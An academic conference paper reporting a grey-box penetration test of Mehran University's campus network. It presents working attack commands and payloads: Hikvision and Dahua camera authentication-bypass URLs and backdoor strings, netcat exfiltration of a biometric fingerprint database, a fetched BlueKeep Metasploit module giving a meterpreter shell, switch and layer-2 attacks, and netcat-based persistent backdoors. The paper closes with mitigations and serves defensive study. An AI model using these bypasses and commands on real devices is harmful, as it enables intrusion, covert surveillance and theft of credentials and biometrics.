19 December 2020 (INCCST’20), MUET Jamshoro Case Study ...

2nd International Conference on Computational Sciences and Technologies, 17-19 December 2020 (INCCST’20), MUET Jamshoro

ISBN-978-969-23372-1-2 114

Case Study: Intranet Penetration Testing of MUET

Shameel Syed

Department of Telecommunication

Mehran University of Engineering and

Technology

Jamshoro, Pakistan

[email protected]

Faheem Khuhawar



Technology

Jamshoro, Pakistan

[email protected]

Khizra Arain



Technology

Jamshoro, Pakistan

[email protected]

Talha Kaimkhani



Technology

Jamshoro, Pakistan

Zohaib Syed



Technology

Jamshoro, Pakistan

[email protected]

Hasan Sheikh



Technology

Jamshoro, Pakistan

Shahroz Khan



Technology

Jamshoro, Pakistan

Abstract—Every organisation with its available resources

requires its network to be secure from any sort of internal or

external threats. This requires implementation and proper

assessment of overall security measures. In this paper, we highlight

how educational campus intra-network can be highly vulnerable

due to improper configurations or inadequate security measures.

Our investigation through penetration testing has allowed us to

gain access of more than 50% of distribution and core switches

from Cisco, IP cameras from Dahua and Hikvision, Bio-metric

Systems from ZKTeco, MikroTik RouterOS, and PCs/Serves

having vulnerabilities like BlueKeep. Systematic procedure is

presented in this paper to perform the attacks along with the recommendations to implement proper security measures.

Keywords—Network Security; Penetration Testing; Testing;

Exploitation; Attacks

I. INTRODUCTION

If vulnerability is utilized by an unauthorized individual to

access a company’s network, its resources can be compromised.

The objective of a penetration test is to address vulnerabilities

before they can be exploited. Penetration testing is a

comprehensive method to test the complete, integrated,

operational tests that consists of hardware, software and people.

There are three main types of penetration testing namely, black

hat penetration testing, white hat penetration testing and grey

hat penetration testing.

Black hat penetration testing scans the remote hosts for

possible vulnerabilities with no prior knowledge of target,

analyzes the vulnerabilities and their possible risk, and finally

report them. White hat penetration testing is provided with a

significant knowledge of the target. It is a simulation of an

attack by a penetration tester who is having a detailed

knowledge of the network environment. Grey hat penetration

testing, also called gray box analysis, is a strategy in which the

tester has limited knowledge of the internal details of the

network. Gray hat approach is used when specifically, the threat

of the attack is considered to be an inside job. We have used

Grey Hat Approach in our research. Penetration testing has 4

steps to perform.

• Reconnaissance/ Information Gathering

• Scanning

• Exploitation

• Post exploitation

Network scanning is a procedure for identifying devices on a

network by employing features in the network protocol to

signal devices and wait for a response. Most network

scanning is used in monitoring and management, but scanning

can also be used in identifying network elements or users for

attacks. Exploitation is a piece of a software, a sequence of

commands or a chunk of data that usually takes advantage of

bug or vulnerability to cause unintended things or unintended

behavior to occur on target machines. Such unintended

behaviors include features like gaining control of a system,

allowing privilege escalation or Denial of Services (DoS)

attacks. Most devices connected to the Internet these days are

not maintained and monitored properly. Instead, these are

devices that are often not understood as computers but are

termed as” things”, giving rise to the term,” Internet of Things”.

II. Literature Review

A penetration test is defined as a controlled attempt of

penetrating into a network from outside in order to detect

vulnerabilities [1]. In this age of continuously advancing

technologies, every organization whether it be a university, a

115

hospital or military organization is network based. This makes

work-related tasks more efficient and effective but also

increases their risk of being targeted by a malicious threat either

for any agenda or for personal gain. This is where penetration

testing is important. Offensive security techniques are used in

order to discover possible flaws in the network. For an IoT

company, it can be said as an act of complimenting the

defensive security measures before IoT motes are deployed [2].

It is a basic instinct of a security expert to think like a criminal

in order to fill the gaps from criminals’ perspective. So, it is a

basic necessity for the penetration tester to know as much as or

more than what an attacker can know, in order to make the

results meaningful [3].

Wireless connections are low cost and convenient for

connecting network devices. The simplicity with which it gives

connection is also a reason for attackers to target wireless

network. Therefore, authentication protocols have been made

for keeping unauthorized access out of the network. The two

most commonly heard encryption schemes for wireless

networks are Wired Equivalent Privacy (WEP) and Wi-Fi

Protected Access (WPA). The WEP algorithm was made to

secure wireless internet connections in 1997, but it was

vulnerable on many levels [4]. So WPA was developed as a

second encryption standard which solved many problems lying

in WEP. The latest version of WPA is WPA2. WPA2 provides

stronger encryption than that of WPA rated standard [5]. Both

gives the choice of two security modes, i.e., TKIS and AES

encryption modes. WPA2-PSK protocol can be used in a

wireless distribution system. For home users, WPA2PSK (AES

Pre Shared Key) is used. The corporate security is based on

802.1X, the EAP authentication framework that uses a

RADIUS, such as EAP-TLS, which provides a much stronger

authentication system, and secure key distribution [6]. The

greatest attack that engraved its name recently is WannaCry.

WannaCry is a type of a ransomware; a ransomware is a type

of malware that takes full control of the targeted system and

demands ransom for the safe return of the functionality of the

system. WannaCry is a software that make use of Eternal Blue

and Double Pulsar. It started on May 12, 2017. Eternal Blue is

a well-known vulnerability in the Server Message Block (SMB)

protocol employed by Microsoft Windows operating the ports

445 and 139. Once the malware is injected in the machine, it

searches for backdoor. WannaCry malware spread to over

300,000 systems in over 150 countries [7]. There was only one

agenda of WannaCry, to collect ransom. It froze or completely

locked down the target systems by placing an encryption and

demanded about $300$600 to release the lock.

CCTV cameras, that are the very eyes of an organization and

keep security in check, can also be exploited. A cyber-attack on

a Russian bank gave hackers access to 24,000 CCTV cameras

in 30 different countries. This attack led the bank to lose more

than 31 million USD. [8] Recently, a new vulnerability released

in Microsoft’s RDP service which is considered to be as

dangerous as EternalBlue. This paper also illustrates the

exploitation and safety measures of this vulnerability.

According to the estimation provided by US Computer

Emergency Response Team (Cert), almost 40 percent of IT

security breaches are perpetrated by people inside the company.

Additionally, FBI/CSI Risk Assessment implied that many

enterprises’ ports are opened, and any laptop can plug into the

network and gain access as a common practice. The total loss

of the companies surveyed was approximately over 130 million

USD with average expenditure per employee being about 241

million USD per year. 28 percent of the employees stated they

had no idea if they were attacked and how many times they

were attacked. Yet about 32 percent of employees said they

were never attacked from the inside. This paper deals with the

penetration test procedure for determining the security levels so

as to highlight the possible vulnerabilities that could be

exploited in the Campus Area Network (CAN) of Mehran

University of Engineering and Technology (MUET) including

the IP cameras, Biometric systems, and switches deployed

within the network. This paper explains various data link

protocols that have been compromised during the research.

Although, a lot of work has been done in the area of penetration

testing, we have specifically followed standard penetration

testing on the live network of Mehran University of

Engineering and Technology using Gray Hat approach.

III. METHODOLOGY

Network Penetration testing has following four steps.

A. Reconnaissance

Reconnaissance is the process of collecting information

about the target without being discovered, and use that

information to perform a detailed penetration test.

Reconnaissance is the biggest phase any penetration tester goes

through to identify devices on the network and their

interconnection. Generic topology of campus area network is

shown in Figure 1 that is gained through survey and later

verified.

Fig. 1: Network Diagram of Campus Area Network

To gain basic information about DHCP, DNS and subnet IP

address, following commands were used.

116

username@hostname:∼$ ifconfig

It was found that subnet IP changed with the change of

departments, i.e., every department at MUET has different

subnet ID, and DHCP was part of it. Whereas, the local DNS

information remained same. ICMP (ping) messages were sent

from one department to another, as a result of which it was

realized that tagged information was being sent along with a

VLAN ID. Using this approach, information about VLANs of

different departments were collected. Later, this information

was verified after discovering misconfigured switches that

allowed unauthenticated bypass, if first two or three sessions

via telnet protocol are maintained beforehand, whereas fourth

session allows an attacker to enter the switch without prompting

for any password.

username@hostname:∼$ telnet 172.16.X.X

This allowed Cisco IOS shell to be enabled, and eventually

configuration file can be read, through which complete toplogy

of MUET’s network can be discovered, i.e., how core,

aggregation, distribution, and access switches are

interconnected with one another. Furthermore, additional

information, such as rules of ACL and configuration of L2

protocols such as CDP, VTP, STP, and DTP, was also collected.

B. Scanning

The process of Scanning identifies security weaknesses in

remote target network or local hosts. To achieve this, IP address

information of live hosts and layer-2 devices was collected.

Later, targeted hosts were scanned for open ports using a tool

called nmap.

username@hostname:∼$ nmap -T4 -A -v

By this approach, tables of hosts with IP addresses and their

corresponding MAC addresses along with open ports were

made. Due to VLANs restriction, initially, the scan was being

done on each VLAN separately. Later on, after the exploitation

of core switch, detailed information was retrieved quickly and

without any exhaustion.

C. Exploitation

1) Switches: The switches with open Telnet ports were

targeted, after a care-full review of scanning results. Upon

attempting to access switches, it was discovered that more than

50% switches used default credentials, irrespective of their

vendors. Switches that had their default passwords changed,

were misconfigured, such as using vty 0 4, allowing accessing

to switch after 5 simultaneous virtual connection sessions.

Figure 2 shows snapshot of accessing the core switch.

1 The tool hashcat needs to be installed first on the PC (Linux or

Windows).

Fig. 2: Accessing Core Switch

It was discovered that “Cisco IOS Shell” was enabled,

through which configuration files of all of the core switches

could be copied. From these configuration files, intensive

information that helped in exploiting various L2 protocols was

gathered. Hash password of users having privilege level of 15

and password to enter global configuration mode of the switch

can also be retrieved from the configuration file which was later

on cracked with the help of hashcat1.

This paper demonstrates the use of hashcat from Windows

OS. Assuming that hashcat is installed in C drive, following

command was used to brute-force the password, while

assuming that the password consisted of 6 characters, where

crack.txt is the name of the files which stores hashes of Cisco

Type 5. The output of hashcat is shown in Figure 3.

C:\hashcat>hashcat64.exe -a 3 -m 500 crack.txt ?a?a?a?a?a?a

Switches with Cisco IOS are by default allowed to write data

into flash storage, this was further exploited to write malicious

code and somehow trigger it to spread the malware throughout

the network. Figure 4 demonstrate the proof of writing and

adding a text file into the core switch.

All of the files in flash storage of the switch can be seen and

the configuration file can be read using cat command.

Fig. 3: Hashcat

Fig. 4: Writing data into the flash storage of core switch

Linksys switches have been exploited through a

vulnerability, called “The Moon”. This vulnerability can be

exploited through Metasploit or Routersploit. Figure 5

demonstrates how it is done.

117

Fig. 5: Exploitation of Linksys switches

Remote network connection is a basic necessity for the

management of enterprise networking devices. Accessing

routers and switches on daily basis for tasks such as, creating

and removing VLANs, adding or removing interfaces. The

access to the router/switch is done via either Telnet or Secure

Shell (SSH). Using Telnet is rather common even if it is an

insecure way. It is highly recommended that SSH be used

instead of

Telnet.

2) Routers: It was discovered that the currently deployed

router on the campus was running MikroTik Router OS 42.9.

An easier approach was carried out in which a preinstalled tool

called searchsploit was utilized in order to find the

vulnerabilities of the vendor MikroTik.

Figure 6 shows that MikroTik RouterOS v6.42.9 is

vulnerable for the following defined version. To exploit,

following command was used. cat /usr/share/exploitdb/exploits/hardware/remote/46444.txt

Furthermore, DoS attack defined in the exploits as searched

by Searchsploit can be performed on MikroTik RouterOS using

following command. python /usr/share/exploitdb/exploits/hardware/dos/18817.py

172.16.X.X config 9

3) IP Cameras: Organizations pay no attention to

security vulnerabilities before purchasing and deploying CCTV

cameras. Our investigation led us to exploit IP cameras from

different vendors, most of the vulnerabilities of these devices

Fig. 6: Searching Exploits by Searchsploit

are well documented, yet they were still not patched. We

demonstrate how easy it was to gain access into the CCTV

system using brute-force attack via a tool called Hydra. Figure

7 demonstrates how Hydra is used.

Fig. 7: Dictionary Attack on IP Cameras

From those IP Cameras, database was extracted but the

passwords were encrypted using the proprietary algorithm of

the company. Hash passwords were extracted from the database

and those hashes were put to access cameras from Hikvision.

This allowed access to camera directly, suggesting poor

implementation from Hikvision and a vulnerability of these

cameras.

Another downside of using IP cameras on intranet is that the

passwords have to be hashed offline, which means that the

algorithm must be somewhere in the system. After exploring

the camera, algorithm was found to be in sofia.py. Figure 8

demonstrates how this algorithm converts “888888” to hash.

Fig. 8: Hashing Algorithm

Afterwards, a script was written to perform brute-force attack

to find the passwords of the registered users and thus access was

gained on different cameras which were not accessible via

Telnet. It was found out that “Hikvision” and “Dahua” use the

same algorithm to convert plain-text into hash. The database

from some of the cameras was compromised due to the

existence of backdoor in the camera using these different links

on different cameras: http://<IP>:<Port>/mnt/mtd/Config/Account1

http://<IP>:<Port>/mnt/mtd/Config/Password http://<IP>:<Port>/current-

config/Passowrd

After Dahua noticed that hackers have been accessing

cameras by default usernames and passwords, they gave a patch

that disabled the telnet access. However, disabling the remote

access turned out to be a much bigger obstacle for users to

access IP cameras than it was thought, because in case

usernames and passwords were forgotten, there was no way to

access the cameras. To cope with that situation, Dahua gave a

script to access cameras through telnet. http://<IP>:<Port>/cgi-bin/configManager.cgi?action=

setConfig&Telnet.Enable=true

After entering the script, a username and password is asked.

But before the password, a string “7ujMko0” had to be added.

For example, if username and password is “admin”, so

password has to be provided like: “7ujMko0admin”. Recovered

passwords retrieved from previous methods were utilized with

this string, and it also let default credentials open the telnet door

of various cameras.

In some cameras of Hikvision, entering following script into

the browser allows an attacker to bypass authentication. http://<IP>:<Port>/Security/users?auth=YWRtaW46MTEK

118

Worst part is that, by using this method, configuration file of

Hikvision cameras can also be downloaded. http://<IP>:<Port>/System/configurationFile?auth= YWRtaW46MTEK

This configuration file contains usernames and passwords (in

plain-text) for all configured users. Files are encrypted but

encryption is easily reversible because of the presence of a

static encryption key which is derived from the password “abcdefg“.

http://<IP>:<Port>/onvif-http/snapshot?auth=YWRtaW46MTEK

Above script allows the attacker to take a snapshot from the

IP camera as it can be seen in Figure 9.

Fig. 9: Snapshot Taken by Entering Script

This vulnerability also allows an attacker to change the

password of the IP cameras of Hikvision very easily as it can

be demonstrated in Figure 10.

There is a protocol, “Onvif”, which was enabled on majority

of the cameras and it was left unprotected due to the lack of

knowledge of this protocol. Through this protocol, the use of

the URL in a software like “VLC Media Player“allows access

to the IP Cameras using default credentials. rtsp://<IP>:<Port>/cam/realmonitor?channel=1&subtype=0&

unicast=true&proto=Onvif

“Onvif Device Manager” can be used to manage the cameras

in which this protocol is enabled. This allow to add/delete users,

change the movement of the camera, speak into the camera,

changing DNS server, changing NTP server and other features

as well. The snapshot of using Onvif to access IP cameras is

shown in Figure 11.

Fig. 10: Software based on this vulnerability

Fig. 11: Accessing cameras using ONVIF

4) Bio-metric Systems: Bio-metric fingerprint systems are

used throughout the campus for the purpose of attendance of

faculty members in the campus, and in some organizations, bio-

metric systems are used as locks for doors. Penetration testing

is done on two models of ZKTeco, uFace800/ID and

iClock880-H/ID. Linux Kernel embedded in these systems are

ZM220, ZEM600 and ZEM800.

Telnet door was enabled on these machines and default

passwords were not changed due to which access was gained

into the systems after performing brute-forcing with the use of

probable wordlists. Figure 12 demonstrates accessing IP

camera via telnet.

Fig. 12: Accessing biometic via Telnet

First, database file were searched using the following command.

find -name *.db

119

It will search all the files in the system having extension .db,

which denotes a database file. After navigating to that directory,

a database file was transferred using a tool netcat. The

command from sending side (ZEM220) was,

nc 172.16.23.32 9999 < ZKDB.db

172.16.23.32 is the IP of the PC where file was required to

be received but port 9999 had to be open on the PC that received

the transferred file using the following command on the PC.

nc -l -p 9999 > ZKDB

Where, -l denotes that the port 9999 is opened to listen from

the remote connection. “sqlite” or any other software can be

used to view the transferred file.

After making changes, the .db file was uploaded to system

the same way it was downloaded, using the tool netcat.

UDP Port 4370 of ZK5000-ZK9000 allows anyone to

connect to the system without any proper authentication.

Custom commands can be created and sent to the device

through UDP port 4370 to download information. This can be

confirmed using the tool called Scapy from Linux OS.

Alternatively, proprietary software of this company is also

available which uses this port to connect to the device without

password. Although other versions of this software can be used

to exploit this vulnerability, but this has been confirmed by

employing the software “ZKTeco 5.0” as shown in Figure 13.

Fig. 13: Snapshot of ZKTeco 5.0

This shows that one device has been connected, without

providing any password. Following actions can be performed

with this software;

1) Add a user

2) Delete a user

3) Change privileges of users

4) Modify Attendance Logsheet, i.e., change time and nature

of attendance

This database can be decrypted to extract the fingerprints of

the users registered in the device these extracted fingerprints

then can be used against the user in various ways, i.e.,

impersonation, identity theft, etc.

5) Exploiting Vulnerabilities in an Operating System: In

different networks of different organizations, there is a

plethora of vulnerabilities to exploit varying in accordance

to the users. Different vulnerabilities were discovered in

scanning phase which have been exploited to gain access

in various systems. One of the most common vulnerability

to access the system is Eternal Blue which could be

exploited easily through Metasploit framework. This

paper focuses on following two vulnerabilities.

Firstly, this paper demonstrate the exploitation of an old bug

that has been present in Netatalk for a long time. Pea is a proof

of concept which bypasses authentication to gain control of

execution flow of Netatalk as shown in Figure 14. This

vulnerability has been patched in 3.1.10. Further details of this

explanation can be found on the website of NIST by searching

for CVE-2018-1160.

Fig. 14: Exploitation of Netatalk 3.1.10

Secondly, this paper explains the exploitation of a

vulnerability which is a hot topic these days. Bluekeep

(CVE2019-0708) is a recently found vulnerability that has been

discovered in RDP service of Microsoft. This is a wormable

vulnerability which can be considered as dangerous as

EternalBlue. After being exploited, this vulnerability provides

an attacker with complete access on host’s system.

From scanning phase, information was gathered to know

which hosts are using RDP Service of Microsoft. Following text

demonstrates further scanning it with the module of Metasploit,

to evaluate how many of the hosts are vulnerable to Bluekeep

vulnerability.

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 172.16.100.3 172.16.100.5 172.16.100.6

172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...

RHOSTS => 172.16.100.3 172.16.100.5 172.16.100.6

172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

[*] 172.16.100.3:3389 - The target is not exploitable.


[*] Scanned 2 of 18 hosts (11% complete)

[+] 172.16.100.5:3389 - The target is vulnerable.


[*] Scanned 4 of 18 hosts (22% complete) [+] 172.16.100.11:3389 - The

target is vulnerable.

...

Since metasploit recently launched the module for exploiting

Bluekeep, the module had to be manually added.

wget https://github.com/rapid7/metasploit-framework/raw/

edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/

exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

mv cve_2019_0708_bluekeep_rce.rb

/usr/share/metasploitframework/modules/exploits/windows/rdp/

After that, open metasploit and run the following command,

reload_all

120

set RHOST target and launch the attack. After the attack was

done, a meterpreter shell was provided through which complete

access over victim’s PC was gained as it can be seen in Figure

15.

Fig. 15: Exploiting Bluekeep

Other than exploiting devices as a whole, this work also

focuses on exploiting protocols of data-link layer in TCP/IP

suite.

The main purpose to build TCP/IP suite was to ensure that

different layers work without the knowledge of each other. But

unfortunately, this means that if any one layer of TCP/IP suite

is attacked, other layers will not get any idea of the problem. In

networking, layer-2 is a very weak link and prone to attacks.

Following layer-2 protocols have been compromised namely,

ARP, VTP, STP, and DTP.

6) ARP Spoofing: ARP is used to discover MAC address

associated with given IP address. A client can send an

unsolicited reply which is called a gratuitous ARP, and other

hosts can save that information in their ARP tables in the same

subnet. This way, anyone can claim to have any IP/MAC

address. This is how ARP attacks redirect traffic. There are

certain countermeasures to ARP spoofing attacks, such as using

DHCP snooping binding table, in which it is necessary for all

ARP packets to match the binding table entries or else the ARP

packets will be discarded. This is done when dynamic ARP

inspection is enabled. In the network under consideration,

DHCP Snooping is enabled but there is a Proxy Server

deployed in the network which authenticates each time a

request is sent. Since the Proxy server is using HTTP protocol,

then by poisoning the whole VLAN, usernames and passwords

of clients can be retrieved. MITMF v0.9.8 tool is used to

demonstrate the procedure as shown in Figure 16. The example

demonstrates ARP poison by setting gateway address and target

range.

Fig. 16: ARP Spoofing using MITMF

7) DTP Attack: On a switch, a port is configured in two ways.

Either as an access port or as a dynamic port.

When a host is connected to a switch, an access port is used.

With VLAN implementation, each access port is assigned to

only one VLAN. On the contrary, a trunk port allows the traffic

of multiple VLANs to pass through. A trunk port can be

configured via a Cisco propriety protocol called Dynamic

Trunking Protocol (DTP). DTP automates the IEEE 802.1x/ISL

Trunk configuration. It does not operate on routers.

Synchronization of trunking mode on end links is done by the

DTP. DTP state on trunking port can be set to “Auto”, “On”,

“Off”, “Desirable”, or “Non-Negotiate”.

In switch spoofing attack, the attacker impersonates as a

switch in order to trick a legitimate switch into creating a

trunking link between them. As already mentioned, any

VLAN’s packets are allowed to pass through the trunking link.

Upon establishment of the link, traffic from any VLAN can be

accessed by an attacker. The chance of success of this exploit

depends solely on the fact that the legitimate switch is

configured as “Dynamic Desirable”, “Dynamic Auto” or

“Trunk mode”. Since the switches under consideration were

configured as “Auto”, so a switch spoofing attack was

performed using the tool Yersinia v0.8.2 as shown in Figure 17,

and thus a trunk link was formed.

Fig. 17: DTP attack using Yersinia

It can be clearly seen that, access port was assigned and then

it turned into trunk link after a successful DTP attack. This

attack also provides a way for VLAN hopping attack / double

Encapsulation attack. This attack can be prevented by manually

assigning each port as an access or trunk port. Further security

121

measures include using a different VLAN other than default

VLAN as a Native VLAN.

8) VTP Attack: Switches are added to a VTP domain for them

to use VTP. This VTP domain is defined in a VTP server, and

later clients and transparent devices as well. Whenever a new

VLAN is added/created in a VTP server, the VTP server will

automatically distribute this information among all the switches

present in the VTP domain. All the switches (except the VTP

server) are defined as client switches, and their task is to listen

to the changes regarding VLANs by the VTP server. Switches

that are configured transparent, without altering their VLAN

assignments, will simply forward the VTP information. This is

really useful when there are a lot of switches involved in the

network. Since all VLAN information can simply be altered

from any place and automatically be changed due to VTP

server. On the other hand, some risks are involved that an

attacker could exploit that usefulness by creating a rogue VTP

server and gain complete control over the VTP domain VLANs.

To remedy that, VTP implements MD5-based authentication in

the VTP frames. In MD5 authentication, VTP server has a

password for authenticating the VTP domain switches, without

that password switches will not authenticate VTP information.

Password is sent in MD5 hash. This hash is then verified and

used by the client switch. There are mainly two facts to consider

when injecting VTP frames. The port should be turned into a

trunk by the attacker (via DTP attack), and the VTP

configuration revision number should be higher than the

previous advertisements of VTP for recent update reflection.

By adding or deleting the VLANs via a rogue VTP server, a

VTP attack is done.

Fig. 18: VTP Information

A rogue VTP server can be made on any switch by increasing

the revision number from the previous one (previous revision

number was known by viewing VTP information in core switch

as shown in Figure 18), after sending the command to change

VLAN configurations via rogue VTP server, the MD5 hash was

sent with that frame and there were no qualms in accepting that

malicious frame since the hash was authenticated. This was

done using the tool Yersinia. It is important to know that

exploitation of MD5 hash was possible because switches were

configured with VTP Version 2. The remedy of that is to

implement VTP Version 3. VTPv3 uses status made up of

primary and secondary VTP servers. Primary status is used only

when there is a need to make changes. Other switches are

secondary by default which secures the network from this

attack.

9) CDP Attack: The Cisco Discovery Protocol (CDP) is

another propriety protocol of Cisco used by all devices by

default. Directly connected devices are discovered using CDP,

to simplify their configuration and connectivity. There is no

maintained encryption in CDP messages. Information of CDP

is broadcasted periodically, updating each device’s CDP

database. Routers cannot propagate it because CDP is a layer 2

protocol. Information of network devices such as software

version, IP address, capabilities, platform, interfaces and the

native VLAN information are gathered up in CDP. Ultimately,

whole network’s topology could be determined using CDP and

if it gets into an attacker’s hand, this information could be used

to exploit the network in many ways, mainly in the form of a

Denial of Service (DoS) attack. Attacker can get CDP

information via Wireshark or other network analyzer tool to

sniff out the broadcast messages sent by the CDP. For example,

if attacker gets to know the Cisco IOS version of the device as

shown in Figure 19. This information is enough to search for

exploits in that particular version. The attacker can also send

malicious or bogus CDP packets to the directly connected Cisco

devices, which can cause the switch to utilize its CPU to a

maximum of 100%.

CDP is a useful protocol when documentation of a network

is being made and in most cases CDP is enabled on every switch

and port in the network.

Fig. 19: CDP

10) STP Attack: Spanning Tree Protocol (STP) is used to

avert the loops being formed on layer-2 switches or bridges

network with multiple paths for redundancy reason. Switches

are made aware of each other and the bandwidths of links being

used between them. The switches can then select a path that is

both loop-free and with maximum possible bandwidth in the

network. The decision of choosing the link is based on STP path

cost. There is a reference point to control the STP called Root

Bridge. The root of STP is selected from the switches via

Election Process. All the traffic goes through root bridge.

Subsequent to the election of root bridge, a root port is elected

that has the shortest STP path cost to the root bridge. After that,

designated ports for each segment of network are selected. All

the STP attacks differ based on the modification of one or more

fields of BPDU frames. After sniffing existing legitimate

BPDUs and taking their settings into account, the most

dangerous attack type would be presenting a machine under

122

your control as the Root Bridge, so that all the traffic in the STP

topology should go through the attacker.

STP BPDUs should not propagate through access ports, but

such BPDUs were accepted due to misconfiguration. Knowing

the bridge priority from the reconnaissance phase (via core

switch), bridge priority of a switch chosen from the network

was changed to be lower than the root switch, thus making that

switch the root bridge which enabled the whole data to be

sniffed. Above mentioned attack (called root role attack) can be

thwarted by Root Guard and BPDU-guard, which were not

enabled here. Secondly, STP DoS attack was also performed by

sending thousands of packets per second with the help of

Yersinia. The switch processed so many config BPDU packets

which kept on constantly changing the root bridge within the

STP topology, rendering STP confused. Thirdly, another DoS

attack was performed in which TCN BPDUs were sent to the

root bridge which caused the STP topology to change

continuously. BPDU filtering can be used to mitigate both

above mentioned DoS attacks.

11) DHCP Starvation: DHCP protocol is an integral

component, the function of which is the configuration of client

machines with IP addresses and other information such as

subnet mask, DNS address and default gateway.

DHCP starvation is an attack that targets DHCP servers in

which malicious DHCP requests are made to exhaust the IP

pool of all the available IP addresses. As a result, proper

network users get DoS. DHCP Starvation can be launched even

with a minimal bandwidth [9].

In our attack, it can be seen in Figure 20, DHCP Release

Message is sent as broadcast in the VLAN to release IP

addresses of the users, followed by immediately sending DHCP

Request Message to completely exhaust the IP pool of the

DHCP server.

Fig. 20: DHCP Attack

Afterwards, DHCP Rogue Server can be created to assign IP

addresses through our system and then perform ManIn-The-

Middle attack on the victims who have obtained IP addresses

through rogue DHCP.

D. Post Exploitation

The purpose of this phase is to create a alternate way to get

into the system so that the accessibility to compromised

systems remain intact. For that, backdoors were created and

then deployed on compromised IP Cameras and Biometric

systems. In bio-metric systems, persistent backdoor was created

via netcat tool. However, different vendors of IP Cameras (or

even some bio-metric systems) do not support netcat tool, so in

order to create persistent backdoors in such systems, tools like

ShellPop or TheFatRat can be used.

IV. CONCLUSION

Securing the network of an organization requires penetration

testing. This helps to identify vulnerabilities which can be

exploited for malicious intentions. Network administrator

should be aware of the security aspect of different protocol

configurations on networking device. This awareness helps

employees to avoid internal, external, and social engineering

attacks on network. Moreover, a well thought out security

policy which lines in with the organization’s need is rather a

very important factor when deploying a network.

The following step must be taken to mitigate the threats as

outlined in this research paper. (1) Change the default

credentials of all the protocols configured in a network. And for

the devices which allow unauthenticated access shouldn’t be

allowed remote access. Alternatively, a restricted access should

be allowed to authorized users by deploying specific security

policies. (2) Configure port security to prevent DHCP

starvation attack. (3) Enable DHCP snooping feature will

prevent Rogue DHCP Server attacks. (4) ARP attacks can be

prevented by Dynamic ARP Inspection (DAI). (5) IP/MAC

spoofing can be prevented using IP source guard (IPSG)

feature. (6) SSH should be used instead of Telnet to configure

network devices remotely as Telnet establishes a session where

information flows in plain text which can be easily sniffed via

Wireshark or any other sniffing tool. (7) Passwords must be set

for all VTY sessions and not just for the first three or four

sessions otherwise attacker can exploit this to attack a network.

(8) Port security should be enabled on all the active interfaces

(access port) of switch and all unused port should be shut down

to avoid unauthorized access. (9) IDS or ARP inspection

prevents ARP attack. (10) For prevention of attacks related to

STP, BPDU-guard and Root-guard feature should be enabled.

(11) Use VTP version 3 to fend off against VTP attacks. (12)

Use CDP only when it is necessary.

REFERENCES

[1] S. Turpe and Jrn Eichler. Testing production systems safely: Common

precautions in penetration testing. pages 205 – 209, 10 2009. [2] Chung-Kuan Chen, Zhi-Kai Zhang, Shan-Hsin Lee, and Shiuhpyng Shieh.

Penetration testing in the iot age. Computer, 51:82–85, 04 2018. [3] Bishop Matt. About penetration testing. IEEE Security and Privacy,

5(6):84–87, 2007. [4] Erik Tews and Martin Beck. Practical attacks against wep and wpa. In

Proceedings of the second ACM conference on Wireless network security,

123

pages 79–86. ACM, 2009. https://dl.acm.org/citation.cfm?id=1514286,

last accessed on 2019-09-30. [5] Joseph Mwangi, Dr. Wilson Cheruiyo, and Dr. Michael Kimwel. Security

analysis of wpa2. Control Theory and Informatics, 5, 2015. https://pdfs.

semanticscholar.org/bbd9/af99e0ff0a1df675d4dbac81b8d815999869.pdf,

last accessed on 2019-09-30. [6] Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, and Behrang

Samadi. A survey on wireless security protocols (wep, wpa and

wpa2/802.11 i). In 2009 2nd IEEE International Conference on Computer

Science and Information Technology, pages 48–52. IEEE, 2009. https:

//ieeexplore.ieee.org/abstract/document/5234856, last accessed on

201910-12. [7] Ashok Koujalagi, Shweta Patil, and Praveen Akkimaradi. The wannacry

ransomeware, a mega cyber attack and their consequences on the modern

india. International Journal of Information Technology, 6(4):1–4, apr

2018. [8] Mohammed Farook Bin Rafiuddin, Prethpal Singh Dhubb, and Hamza

Minhas. Recent study of close circuit television (cctv) in hacking.

International Journal of Advance Research in Science and Engineering,

6(4):551–561, apr 2017. [9] N. Tripathi and N. Hubballi. Exploiting dhcp server-side ip address conflict

detection: A dhcp starvation attack. In 2015 IEEE International

Conference on Advanced Networks and Telecommuncations Systems

(ANTS), pages 1–3, Dec 2015.

19 December 2020 (INCCST’20), MUET Jamshoro Case Study ...

Documents

Transcript of 19 December 2020 (INCCST’20), MUET Jamshoro Case Study ...